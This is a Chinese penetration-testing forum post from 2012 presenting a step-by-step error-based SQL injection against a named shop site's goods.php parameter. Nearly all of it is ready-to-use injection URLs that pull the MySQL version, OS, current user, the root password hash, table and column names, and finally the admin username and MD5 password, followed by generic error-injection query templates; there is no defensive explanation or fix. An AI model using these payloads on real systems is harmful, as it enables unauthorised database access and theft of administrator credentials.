找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2063|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ) p# [) l& e% K7 q  _
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( Q( f4 q; e7 _
- |/ b/ P0 ~! L/ O$ C
判断系统. |! |: o  C3 }* H) Q3 F

! C. ?3 K: ?; y% e* Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' ?1 c% c! S. P" X

' M# E7 O. H" I! w- u- g2 Y: r3 G6 ]; j+ D- b. \; b7 ^

9 X1 S' a5 g8 D当前 user()
9 G; N. Z8 q; _& }5 W* A! k  N  v
; X; t$ g# g% X! t- Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 U& t3 U1 S7 U: U+ V
4 g3 e, I! |1 w  X2 j$ o7 v
; Q8 z5 ?+ b8 y5 V
& |4 W% v2 B) S  h2 g, N: @当前 database(). ^" z& Z% F3 @' v- l
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( `6 N' m0 c8 N- o# X7 Q2 r  x2 k* b9 f" t, J1 L/ `
; u( s0 n% l/ s3 E9 S! a

. d3 E; [3 V7 C; E9 w  A8 S* J) v/ [" o. M: ~5 P
root hash
, F. _( |7 d' d" x0 K7 y$ y$ K, s& g4 u# H" F
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 M' o( }& K2 a2 @$ w5 a/ X
/ v) @3 X! j/ z) t$ e. K0 t8 M6 A' R' o8 R4 G2 k6 g0 F: q
4 V- `4 J9 |9 q9 b: Q
当前 数据库表名
( r/ o$ f$ y+ `* E3 x0 ^) g" p7 Z# z) L$ q8 W2 M, u9 Q- `: `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  y# I: F. _9 B2 n7 _

( P6 R+ i& l& f0 A8 }8 F( [5 \: e) B4 o  o8 m

+ U/ l  i! B3 ]' D/ z+ Y% S$ a当前 数据库 user_name 字段2 f2 j7 C+ d0 Z+ a6 x; [

4 H" j, U; U& v9 {http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ ?: Z7 {3 a* P! c1 h6 I+ d7 b6 ]7 r6 d0 F
当前 数据库 字段 password
3 f  o" [$ r" [0 Z. m; `/ r# Xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* I0 K2 u( k$ v3 p. O1 `
' A9 b+ G+ e& a& {
7 i) K* m& T* O1 J8 l
+ s3 _: M2 G; V8 X4 q* \# V: _
获得 admin passwd(md5)' |6 u% B  Z! D6 v; j
2 I. y3 C' K9 A# V

" ?+ e" h, B  l; phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, ~7 Q& L  w; a8 |1 g
0 I1 U* g, m2 }1 X  J
报错注射( C" U8 c- {2 b
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
2 I5 {5 j$ O  @" w/ z# R* |. v" A% s( A" W1 B& b6 f
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
, w, N5 r9 r. Y+ r6 y  Q; i' S* I- H, C1 q
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表